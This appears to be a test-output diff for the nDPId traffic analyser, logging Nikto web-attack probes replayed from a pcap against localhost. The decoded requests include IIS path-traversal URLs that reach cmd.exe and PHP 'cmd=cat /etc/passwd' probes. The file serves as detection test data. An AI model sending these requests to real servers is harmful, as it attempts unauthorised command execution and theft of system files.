00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277880,"pkt":"AAAAAAAAAAAAAAAACABFAADqdQ5AAEAGxv1\/AAABfwAAAcdaH5DlNEwz0kNZnYAYAED+3gAAAQEICp1m\/6CdZv+gR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIrYzpcIiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}} +01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277882,"pkt":"AAAAAAAAAAAAAAAACABFAAD8MthAAEAGCSJ\/AAABfwAAAcdcH5B7UwvpG4XAvoAYAED+8AAAAQEICp1m\/6GdZv+hR0VUIC9fdnRpX2Jpbi8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277883,"pkt":"AAAAAAAAAAAAAAAACABFAADcUThAAEAG6uF\/AAABfwAAAcdeH5DOhWgJaQI1xYAYAED+0AAAAQEICp1m\/6OdZv+jR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9Y2F0JTIwL2V0Yy9wYXNzd2QgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}} +01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277885,"pkt":"AAAAAAAAAAAAAAAACABFAADVkAVAAEAGrBt\/AAABfwAAAcdgH5ANV6k94mK\/lYAYAED+yQAAAQEICp1m\/6WdZv+lR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9ZGlyJTIwYzpcXCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzIxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":232,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":232,"pkt_l4_len":198,"thread_ts_msec":1576420277887,"pkt":"AAAAAAAAAAAAAAAACABFAADawa5AAEAGem1\/AAABfwAAAcdiH5DPxPiU5alglIAYAED+zgAAAQEICp1m\/6edZv+nR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWNhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}} +01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277889,"pkt":"AAAAAAAAAAAAAAAACABFAADTtGFAAEAGh8F\/AAABfwAAAcdkH5BoGo0gUvgPHYAYAED+xwAAAQEICp1m\/6mdZv+pR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWRpciUyMGM6XFwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277890,"pkt":"AAAAAAAAAAAAAAAACABFAADHrzRAAEAGjPp\/AAABfwAAAcdmH5C4mZZz5s98MYAYAED+uwAAAQEICp1m\/6qdZv+qR0VUIC9pc2FwaS90c3Rpc2FwaS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI2MykNCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277892,"pkt":"AAAAAAAAAAAAAAAACABFAADhOMJAAEAGA1N\/AAABfwAAAcdoH5DDTQGCjXG7iYAYAED+1QAAAQEICp1m\/6ydZv+sR0VUIC9jZXJ0c3J2Ly4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5NCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 